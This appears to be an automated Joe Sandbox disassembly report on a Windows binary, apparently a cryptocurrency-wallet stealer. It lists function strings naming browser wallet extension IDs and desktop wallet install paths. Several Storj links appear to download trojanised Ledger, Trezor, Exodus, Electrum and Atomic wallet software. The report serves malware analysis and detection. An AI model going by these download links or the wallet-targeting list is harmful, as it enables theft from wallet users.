1PawyaJNdMeRZ58R98lDRBDFhVGrvATkk, xrefs: 00007FF7ABC01470
1lRNFMUWkcGIGS67XkeWfhXMPjev6B5Cg, xrefs: 00007FF7ABC01508
1Wvj4ujXtbazj3MOxU05QXrkL4bCHwl2J, xrefs: 00007FF7ABC01721
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF7ABC01694
hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF7ABC0152E
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF7ABC0157D
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF7ABC013F8
1hpFGL_MKbqCzc4V3YaZ29A4JaDrWxIN2, xrefs: 00007FF7ABC01554
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF7ABC01496
1mwoKtHlgA_FGSglUyMP1ZtIPsSVHtwF1, xrefs: 00007FF7ABC01665
1Gl-tclZiwzl6g0KiESfdjoxWpKS4etTy, xrefs: 00007FF7ABC01421
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF7ABC016F2
1Zz3U8oG_dniKMFaigIhNDA-r_Qxo1qXX, xrefs: 00007FF7ABC014BC
1XbWC5eWnyEZCUtT5_ZxFbRnbH9aKnawV, xrefs: 00007FF7ABC016C3
1T6M8C2frvgzxZ5QXvqg3JwQUquC0rvYi, xrefs: 00007FF7ABC01607
efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF7ABC015D8

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: 1Gl-tclZiwzl6g0KiESfdjoxWpKS4etTy$1PawyaJNdMeRZ58R98lDRBDFhVGrvATkk$1Q8Qas1_ewfzUMTS1hokwKRwiYzLHSrWN$1T6M8C2frvgzxZ5QXvqg3JwQUquC0rvYi$1Wvj4ujXtbazj3MOxU05QXrkL4bCHwl2J$1XbWC5eWnyEZCUtT5_ZxFbRnbH9aKnawV$1Zz3U8oG_dniKMFaigIhNDA-r_Qxo1qXX$1hpFGL_MKbqCzc4V3YaZ29A4JaDrWxIN2$1lRNFMUWkcGIGS67XkeWfhXMPjev6B5Cg$1mwoKtHlgA_FGSglUyMP1ZtIPsSVHtwF1$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
API String ID: 73155330-2179249122
Opcode ID: 918cb4a1bcb761b1dfa28e1cb2a0f5d410f0230b9cf2e836c29f87e62ae8fd36
Instruction ID: 6a644e0de2e3e6c3a7bac6da2752daf7af0de27ae666e2fdfa6a30d2c84d019c
Opcode Fuzzy Hash: 918cb4a1bcb761b1dfa28e1cb2a0f5d410f0230b9cf2e836c29f87e62ae8fd36
Instruction Fuzzy Hash: 9CA19852D65BCA45E721EB39C8616F59321FBEA348F916326E58C21877EF68B2C48700

Function 00007FF7ABC01000 Relevance: 25.2, Strings: 20, Instructions: 202COMMON

Download Yara Rule

Strings

nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF7ABC01079
MetaMask, xrefs: 00007FF7ABC010A0
Trust Wallet, xrefs: 00007FF7ABC01051
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF7ABC01266
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF7ABC01112
Martian, xrefs: 00007FF7ABC01237
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF7ABC012C4
hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF7ABC0115E
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF7ABC011AD
Phantom, xrefs: 00007FF7ABC011D9
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF7ABC01028
Nami, xrefs: 00007FF7ABC01295
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF7ABC010C6
OKX Wallet, xrefs: 00007FF7ABC012F3
Coinbase, xrefs: 00007FF7ABC01184
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF7ABC01322
Exodus, xrefs: 00007FF7ABC01138
Crypto, xrefs: 00007FF7ABC010EC
Ronin Wallet, xrefs: 00007FF7ABC01351
efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF7ABC01208

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Coinbase$Crypto$Exodus$Martian$MetaMask$Nami$OKX Wallet$Phantom$Ronin Wallet$Trust Wallet$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
API String ID: 73155330-809053197
Opcode ID: 558d78c46f37a75caeecddcf5e82f011c461c1e932c5431e2adaf8b63981ecbf
Instruction ID: 42d2d7d3e281f10296a7c134dbb1f4bcb44cd0380aabbbcb6d421329e0019d87
Opcode Fuzzy Hash: 558d78c46f37a75caeecddcf5e82f011c461c1e932c5431e2adaf8b63981ecbf
Instruction Fuzzy Hash: A0A19752D25BCA45E721EF39D8917F59321BBEA348F916326B58C21877EF68B2C4C700

Function 00007FF7ABC652F0 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7ABC6533E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC659AA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC65B20
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC65DDE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC65FFE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC6623B
memcpy_s.LIBCPMT ref: 00007FF7ABC66316
memcpy_s.LIBCPMT ref: 00007FF7ABC663C1
memcpy_s.LIBCPMT ref: 00007FF7ABC66490

Strings

1#INF, xrefs: 00007FF7ABC65467
1#IND, xrefs: 00007FF7ABC6542B
1#QNAN, xrefs: 00007FF7ABC65457
1#SNAN, xrefs: 00007FF7ABC6544E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 3d47ef9bc52971a2eb8f9da7c71ac82cef6ca133624d0f3e8089cfb8152a00f3
Instruction ID: 64166827f10768ded365221a1f0306b8f9d806a45134617ee3dc0eb9433260a8
Opcode Fuzzy Hash: 3d47ef9bc52971a2eb8f9da7c71ac82cef6ca133624d0f3e8089cfb8152a00f3
Instruction Fuzzy Hash: 33B2E572E192868BE7249F68D460FFDB7A1FB48348F912135DA0D57AB4DB3CA900CB51

Function 00007FF7ABC2EA20 Relevance: 16.8, APIs: 4, Strings: 5, Instructions: 1017COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC2F8E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC2F8EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC2F8F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC2F900

Strings

Missing ',' or '}' in object declaration, xrefs: 00007FF7ABC2F459
Missing ':' after object member name, xrefs: 00007FF7ABC2F5FD
Duplicate key: ', xrefs: 00007FF7ABC2F1B2
keylength >= 2^30, xrefs: 00007FF7ABC2F8CD
Missing '}' or object member name, xrefs: 00007FF7ABC2F012

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: Duplicate key: '$Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name$keylength >= 2^30
API String ID: 3936042273-466942808
Opcode ID: 3cad9e80d418702ae9d8d0f5d03c02ba6875ec042c3b9f5c2d82beb56eb7ae27
Instruction ID: ded9a86d6181f7eb79d4ed3095789c8854bfe1bb6a709d25d288f40ab2fc31d7
Opcode Fuzzy Hash: 3cad9e80d418702ae9d8d0f5d03c02ba6875ec042c3b9f5c2d82beb56eb7ae27
Instruction Fuzzy Hash: 8F92DF22F1A74641FA14BB29C455BBDA361EF81B84FC25131DE5E1B6FADE3CE5808720

Function 00007FF7ABC31F30 Relevance: 15.6, Strings: 12, Instructions: 602COMMON

Download Yara Rule

Strings

skipBom, xrefs: 00007FF7ABC32742
allowTrailingCommas, xrefs: 00007FF7ABC320D8
failIfExtra, xrefs: 00007FF7ABC32520
allowSpecialFloats, xrefs: 00007FF7ABC3268C
strictRoot, xrefs: 00007FF7ABC3218E
allowDroppedNullPlaceholders, xrefs: 00007FF7ABC32244
allowNumericKeys, xrefs: 00007FF7ABC322FA
allowComments, xrefs: 00007FF7ABC32022
collectComments, xrefs: 00007FF7ABC31F6C
rejectDupKeys, xrefs: 00007FF7ABC325D6
allowSingleQuotes, xrefs: 00007FF7ABC323B0
stackLimit, xrefs: 00007FF7ABC3246A

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: allowComments$allowDroppedNullPlaceholders$allowNumericKeys$allowSingleQuotes$allowSpecialFloats$allowTrailingCommas$collectComments$failIfExtra$rejectDupKeys$skipBom$stackLimit$strictRoot
API String ID: 0-1055134397
Opcode ID: 44472f6b8c109f133b6386ed5293b7edd309c8dfcdbc1d072817c25bb38187e4
Instruction ID: f277d3720d11efbb935f8f03b5291e367461cfd938145d859472e9c62dbee567
Opcode Fuzzy Hash: 44472f6b8c109f133b6386ed5293b7edd309c8dfcdbc1d072817c25bb38187e4
Instruction Fuzzy Hash: C0329711B2A11245FF18FA29D865FFED362AF81B44FC64035DD0E1BABADE2DE5048760

Function 00007FF7ABC3D410 Relevance: 12.9, Strings: 10, Instructions: 352COMMON

Download Yara Rule

Strings

indentation, xrefs: 00007FF7ABC3D4E4
precisionType, xrefs: 00007FF7ABC3D8FD
All, xrefs: 00007FF7ABC3D446
enableYAMLCompatibility, xrefs: 00007FF7ABC3D55A
emitUTF8, xrefs: 00007FF7ABC3D77C
dropNullPlaceholders, xrefs: 00007FF7ABC3D610
commentStyle, xrefs: 00007FF7ABC3D45D
significant, xrefs: 00007FF7ABC3D8E6
precision, xrefs: 00007FF7ABC3D836
useSpecialFloats, xrefs: 00007FF7ABC3D6C6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: All$commentStyle$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$precision$precisionType$significant$useSpecialFloats
API String ID: 0-3087533615
Opcode ID: 187c93caa7a0e9c674156f24fab7250a42805792a85248b1df0cf1491178bd0e
Instruction ID: 3705f7b3e25f8b86fe0ec270bfeb271418dac6257c041b0d02ae48ce7c2c7e45
Opcode Fuzzy Hash: 187c93caa7a0e9c674156f24fab7250a42805792a85248b1df0cf1491178bd0e
Instruction Fuzzy Hash: D2E17525B2A61241FB08FB69D865FFED361AF41B44FC55031ED0E17ABACE2DE5098360

Function 00007FF7ABC017A0 Relevance: 12.6, Strings: 10, Instructions: 142COMMON

Download Yara Rule

Strings

C:\Users\%s\AppData\Local\Programs\atomic, xrefs: 00007FF7ABC01842
Trezor, xrefs: 00007FF7ABC01868
C:\Program Files (x86)\Electrum, xrefs: 00007FF7ABC01926
C:\Program Files\Ledger Live, xrefs: 00007FF7ABC018DA
C:\Users\%s\AppData\Local\exodus, xrefs: 00007FF7ABC017F2
Electrum, xrefs: 00007FF7ABC01900
Exodus, xrefs: 00007FF7ABC017C9
Ledger Live, xrefs: 00007FF7ABC018B4
Atomic Wallet, xrefs: 00007FF7ABC0181B
C:\Users\%s\AppData\Local\Programs\Trezor Suite, xrefs: 00007FF7ABC0188E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Atomic Wallet$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
API String ID: 73155330-2810031701
Opcode ID: 0b0eae0df0b642124a01642c28ce6e5018401797484e5388a46f1f98566f7dd3
Instruction ID: b0c9a3262d90a90a37da5fe4be51a1058ddd867b0be1f5392fd05622b677f2de
Opcode Fuzzy Hash: 0b0eae0df0b642124a01642c28ce6e5018401797484e5388a46f1f98566f7dd3
Instruction Fuzzy Hash: 1D619552E25BC691E700EB38D8917B9A321BBEA348F915335F58C62576EF6CF284C710

Function 00007FF7ABC01A20 Relevance: 12.6, Strings: 10, Instructions: 117COMMON

Download Yara Rule

Strings

https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1, xrefs: 00007FF7ABC01B5A
Trezor, xrefs: 00007FF7ABC01AE8
https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1, xrefs: 00007FF7ABC01BA6
https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1, xrefs: 00007FF7ABC01AC2
https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1, xrefs: 00007FF7ABC01A72
Atomic, xrefs: 00007FF7ABC01A9B
https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1, xrefs: 00007FF7ABC01B0E
Electrum, xrefs: 00007FF7ABC01B80
Exodus, xrefs: 00007FF7ABC01A49
Ledger Live, xrefs: 00007FF7ABC01B34

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Atomic$Electrum$Exodus$Ledger Live$Trezor$https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1$https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1$https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1
API String ID: 73155330-3394481700
Opcode ID: f8a4a3bd6e484db3f333ee16ad722e09342c2504e0c31919c4b3dd24519f3831
Instruction ID: eb5baa611a42b4930b476972469bb27e7bd8c65b22b995892a48c26eac8d8e46
Opcode Fuzzy Hash: f8a4a3bd6e484db3f333ee16ad722e09342c2504e0c31919c4b3dd24519f3831
Instruction Fuzzy Hash: 5E51A452E25B8645E700EB38D8517B9A321BBDA348F916336F58C62876EF7CB1C0C750

Function 00007FF7ABC63D04 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

TranslateName.LIBCMT ref: 00007FF7ABC63D6E
TranslateName.LIBCMT ref: 00007FF7ABC63DA9
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7ABC54DC8), ref: 00007FF7ABC63DF0
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7ABC54DC8), ref: 00007FF7ABC63E28
GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC63FE5

Strings

utf8, xrefs: 00007FF7ABC63F0C

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
Instruction ID: 594aa9289987c0ec4a18c7693a50228417a3a40ec67888bee482a9160048fd64
Opcode Fuzzy Hash: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
Instruction Fuzzy Hash: AD919631A0A78281E724BB1DD461EB9A3A4FF88B80F865131DA4D477B6DF3CE551C322

Function 00007FF7ABC6474C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033

Part of subcall function 00007FF7ABC56F84: FlsSetValue.KERNEL32 ref: 00007FF7ABC56FC9

GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF7ABC648BC

Part of subcall function 00007FF7ABC56F84: FlsSetValue.KERNEL32 ref: 00007FF7ABC56FF6
Part of subcall function 00007FF7ABC56F84: FlsSetValue.KERNEL32 ref: 00007FF7ABC57007
Part of subcall function 00007FF7ABC56F84: FlsSetValue.KERNEL32 ref: 00007FF7ABC57018

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF7ABC54DC1), ref: 00007FF7ABC648A3
ProcessCodePage.LIBCMT ref: 00007FF7ABC648E6
IsValidCodePage.KERNEL32 ref: 00007FF7ABC648F8
IsValidLocale.KERNEL32 ref: 00007FF7ABC6490E
GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC6496A
GetLocaleInfoW.KERNEL32 ref: 00007FF7ABC64986

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
Instruction ID: d5df198be85594c6ce2652fb43ba57c0679039655902f074d5044999aa92eb28
Opcode Fuzzy Hash: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
Instruction Fuzzy Hash: CF717F22F1665285FB50BB68D860EBCB3A4BF4C748F865135CA1D536B5EF3CA445C322

Function 00007FF7ABC436EC Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7ABC43708
RtlCaptureContext.KERNEL32 ref: 00007FF7ABC43735
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7ABC4374F
RtlVirtualUnwind.KERNEL32 ref: 00007FF7ABC43790
IsDebuggerPresent.KERNEL32 ref: 00007FF7ABC437E4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7ABC43801
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7ABC4380C

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
Instruction ID: 07aad611f16254c596d73e43627cc47ea9f7860ac7d8e4fda621a8134e99a45e
Opcode Fuzzy Hash: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
Instruction Fuzzy Hash: FC31727260AB8186EB609F64E8847EDB365FB84704F81403ADA4E47BB5DF3CC648C720

Function 00007FF7ABC4CA44 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7ABC4CABD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7ABC4CAD5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7ABC4CB10
IsDebuggerPresent.KERNEL32 ref: 00007FF7ABC4CB49
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7ABC4CB53
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7ABC4CB5E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
Instruction ID: 5922bc36fa0ec2e701e5e8d7308e06ce14765f78fc9845f62aa2242cec0bb1cf
Opcode Fuzzy Hash: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
Instruction Fuzzy Hash: 0031A232619B8186DB60DF29E844AAEB3A5FB88754F910136EA8D43BB4DF3CC555CB10

